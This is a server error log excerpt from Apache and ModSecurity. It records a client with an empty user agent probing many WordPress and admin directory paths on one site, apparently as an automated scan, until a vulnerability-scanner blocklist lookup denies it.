[Tue May 26 16:41:33.912556 2026] [security2:error] [pid 823496:tid 823709] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5Za08mrtyBNpA4PCzQAAAFE"]
[Tue May 26 16:41:33.912957 2026] [security2:error] [pid 817651:tid 817880] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/widgets/"] [unique_id "ahV_5dlGRCPPN1dS2y2qbAAAAOg"]
[Tue May 26 16:41:34.157494 2026] [autoindex:error] [pid 817651:tid 817810] [client 89.117.104.6:37354] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:34.158258 2026] [security2:error] [pid 817651:tid 817810] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5tlGRCPPN1dS2y2qbQAAAKI"]
[Tue May 26 16:41:34.434981 2026] [autoindex:error] [pid 817651:tid 817870] [client 89.117.104.6:37354] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:34.435719 2026] [security2:error] [pid 817651:tid 817870] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5tlGRCPPN1dS2y2qcAAAAN4"]
[Tue May 26 16:41:34.664560 2026] [security2:error] [pid 817651:tid 817818] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_5tlGRCPPN1dS2y2qdwAAAKo"]
[Tue May 26 16:41:34.664590 2026] [security2:error] [pid 817651:tid 817818] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_5tlGRCPPN1dS2y2qdwAAAKo"]
[Tue May 26 16:41:34.665121 2026] [security2:error] [pid 817651:tid 817791] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/admin/images/slider/"] [unique_id "ahV_5tlGRCPPN1dS2y2qdQAAAI8"]
[Tue May 26 16:41:34.971261 2026] [security2:error] [pid 817651:tid 817784] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_5tlGRCPPN1dS2y2qfAAAAIg"]
[Tue May 26 16:41:34.971309 2026] [security2:error] [pid 817651:tid 817784] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_5tlGRCPPN1dS2y2qfAAAAIg"]
[Tue May 26 16:41:34.976820 2026] [security2:error] [pid 817651:tid 817807] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/admin/fckeditor/editor/filemanager/"] [unique_id "ahV_5tlGRCPPN1dS2y2qegAAAJ8"]
[Tue May 26 16:41:35.150810 2026] [security2:error] [pid 823496:tid 823716] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_5Ja08mrtyBNpA4PCtQAAAFg"]
[Tue May 26 16:41:35.240404 2026] [security2:error] [pid 817651:tid 817908] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_59lGRCPPN1dS2y2qhAAAAQQ"]
[Tue May 26 16:41:35.240428 2026] [security2:error] [pid 817651:tid 817908] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_59lGRCPPN1dS2y2qhAAAAQQ"]
[Tue May 26 16:41:35.241042 2026] [security2:error] [pid 817651:tid 817793] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/sites/default/files/"] [unique_id "ahV_59lGRCPPN1dS2y2qggAAAJE"]
[Tue May 26 16:41:35.562394 2026] [security2:error] [pid 823496:tid 823649] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_55a08mrtyBNpA4PC2QAAABU"]
[Tue May 26 16:41:35.562429 2026] [security2:error] [pid 823496:tid 823649] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_55a08mrtyBNpA4PC2QAAABU"]
[Tue May 26 16:41:35.563109 2026] [security2:error] [pid 817651:tid 817826] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/admin/controller/extension/extension/"] [unique_id "ahV_59lGRCPPN1dS2y2qiQAAALI"]
[Tue May 26 16:41:35.830980 2026] [security2:error] [pid 823496:tid 823717] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_55a08mrtyBNpA4PC4AAAAFk"]
[Tue May 26 16:41:35.831005 2026] [security2:error] [pid 823496:tid 823717] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_55a08mrtyBNpA4PC4AAAAFk"]
[Tue May 26 16:41:35.831579 2026] [security2:error] [pid 817651:tid 817874] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/modules/mod_simplefileuploadv1.3/elements/"] [unique_id "ahV_59lGRCPPN1dS2y2qjgAAAOI"]
[Tue May 26 16:41:36.128803 2026] [security2:error] [pid 823496:tid 823644] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6Ja08mrtyBNpA4PC6AAAABA"]
[Tue May 26 16:41:36.128837 2026] [security2:error] [pid 823496:tid 823644] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6Ja08mrtyBNpA4PC6AAAABA"]
[Tue May 26 16:41:36.131140 2026] [security2:error] [pid 817651:tid 817857] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/components/"] [unique_id "ahV_6NlGRCPPN1dS2y2qkAAAANE"]
[Tue May 26 16:41:36.366132 2026] [security2:error] [pid 817651:tid 817866] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qlAAAANo"]
[Tue May 26 16:41:36.366154 2026] [security2:error] [pid 817651:tid 817866] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qlAAAANo"]
[Tue May 26 16:41:36.366700 2026] [security2:error] [pid 817651:tid 817795] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/admin/uploads/images/"] [unique_id "ahV_6NlGRCPPN1dS2y2qkgAAAJM"]
[Tue May 26 16:41:36.640309 2026] [security2:error] [pid 817651:tid 817786] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qnwAAAIo"]
[Tue May 26 16:41:36.640340 2026] [security2:error] [pid 817651:tid 817786] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qnwAAAIo"]
[Tue May 26 16:41:36.640895 2026] [security2:error] [pid 817651:tid 817895] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/classic-editor/"] [unique_id "ahV_6NlGRCPPN1dS2y2qnQAAAPc"]
[Tue May 26 16:41:36.937511 2026] [security2:error] [pid 817651:tid 817814] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qrQAAAKY"]
[Tue May 26 16:41:36.937539 2026] [security2:error] [pid 817651:tid 817814] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qrQAAAKY"]
[Tue May 26 16:41:36.938058 2026] [security2:error] [pid 817651:tid 817878] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/fonts/"] [unique_id "ahV_6NlGRCPPN1dS2y2qqwAAAOY"]
[Tue May 26 16:41:37.220701 2026] [autoindex:error] [pid 817651:tid 817784] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-content/plugins/contact-form-7/admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:37.221417 2026] [security2:error] [pid 817651:tid 817784] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_6dlGRCPPN1dS2y2qtwAAAIg"]
[Tue May 26 16:41:37.221875 2026] [security2:error] [pid 817651:tid 817852] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/contact-form-7/admin/js/"] [unique_id "ahV_6dlGRCPPN1dS2y2qtgAAAMw"]
[Tue May 26 16:41:37.294920 2026] [security2:error] [pid 817651:tid 817809] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_59lGRCPPN1dS2y2qgAAAAKE"]
[Tue May 26 16:41:37.433648 2026] [autoindex:error] [pid 823496:tid 823641] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-content/plugins/contact-form-7/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:37.434324 2026] [security2:error] [pid 823496:tid 823641] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_6Za08mrtyBNpA4PC_gAAAA0"]
[Tue May 26 16:41:37.435747 2026] [security2:error] [pid 817651:tid 817863] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/contact-form-7/"] [unique_id "ahV_6dlGRCPPN1dS2y2quQAAANc"]
[Tue May 26 16:41:37.671297 2026] [security2:error] [pid 823496:tid 823754] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6Za08mrtyBNpA4PC_wAAAH4"]
[Tue May 26 16:41:37.671328 2026] [security2:error] [pid 823496:tid 823754] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6Za08mrtyBNpA4PC_wAAAH4"]
[Tue May 26 16:41:37.671786 2026] [security2:error] [pid 817651:tid 817862] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wordpress/"] [unique_id "ahV_6dlGRCPPN1dS2y2qugAAANY"]
[Tue May 26 16:41:38.033208 2026] [autoindex:error] [pid 817651:tid 817876] [client 89.117.104.6:37354] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:38.033925 2026] [security2:error] [pid 817651:tid 817876] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_6dlGRCPPN1dS2y2qvQAAAOQ"]
[Tue May 26 16:41:38.219003 2026] [autoindex:error] [pid 823496:tid 823688] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-content/plugins/wordpress-seo/js/dist/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:38.219759 2026] [security2:error] [pid 823496:tid 823688] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_6pa08mrtyBNpA4PDDQAAADw"]
[Tue May 26 16:41:38.220142 2026] [security2:error] [pid 817651:tid 817860] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/wordpress-seo/js/dist/"] [unique_id "ahV_6tlGRCPPN1dS2y2qvwAAANQ"]
[Tue May 26 16:41:38.399175 2026] [security2:error] [pid 823496:tid 823708] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/wordpress-seo/index.php"] [unique_id "ahV_6pa08mrtyBNpA4PDFQAAAFA"]
[Tue May 26 16:41:38.399582 2026] [security2:error] [pid 817651:tid 817906] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/wordpress-seo/"] [unique_id "ahV_6tlGRCPPN1dS2y2qwwAAAQI"]
[Tue May 26 16:41:38.669408 2026] [security2:error] [pid 823496:tid 823717] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6pa08mrtyBNpA4PDGAAAAFk"]
[Tue May 26 16:41:38.669440 2026] [security2:error] [pid 823496:tid 823717] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6pa08mrtyBNpA4PDGAAAAFk"]
[Tue May 26 16:41:38.669736 2026] [security2:error] [pid 817651:tid 817802] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/js/"] [unique_id "ahV_6tlGRCPPN1dS2y2qxwAAAJo"]
[Tue May 26 16:41:38.944569 2026] [security2:error] [pid 823496:tid 823697] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6pa08mrtyBNpA4PDKAAAAEU"]
[Tue May 26 16:41:38.944592 2026] [security2:error] [pid 823496:tid 823697] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_6pa08mrtyBNpA4PDKAAAAEU"]
[Tue May 26 16:41:38.944907 2026] [security2:error] [pid 817651:tid 817815] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/woocommerce/assets/js/"] [unique_id "ahV_6tlGRCPPN1dS2y2qzQAAAKc"]
[Tue May 26 16:41:39.179690 2026] [security2:error] [pid 823496:tid 823647] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_65a08mrtyBNpA4PDNAAAABM"]
[Tue May 26 16:41:39.179719 2026] [security2:error] [pid 823496:tid 823647] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_65a08mrtyBNpA4PDNAAAABM"]
[Tue May 26 16:41:39.180174 2026] [security2:error] [pid 817651:tid 817903] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/woocommerce/"] [unique_id "ahV_69lGRCPPN1dS2y2q0QAAAP8"]
[Tue May 26 16:41:39.243347 2026] [security2:error] [pid 817651:tid 817845] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_6NlGRCPPN1dS2y2qqgAAAMU"]
[Tue May 26 16:41:39.433582 2026] [autoindex:error] [pid 817651:tid 817892] [client 89.117.104.6:37354] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/meta/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:39.434436 2026] [security2:error] [pid 817651:tid 817892] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_69lGRCPPN1dS2y2q0wAAAPQ"]
[Tue May 26 16:41:39.704398 2026] [security2:error] [pid 817651:tid 817816] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahV_69lGRCPPN1dS2y2q1gAAAKg"]
[Tue May 26 16:41:39.883877 2026] [security2:error] [pid 817651:tid 817835] [client 89.117.104.6:37354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_69lGRCPPN1dS2y2q2gAAALs"]
[Tue May 26 16:41:39.883978 2026] [security2:error] [pid 817651:tid 817835] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_69lGRCPPN1dS2y2q2gAAALs"]
[Tue May 26 16:41:40.352165 2026] [security2:error] [pid 823496:tid 823731] [client 89.117.104.6:50580] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahV_7Ja08mrtyBNpA4PDfgAAAGc"]
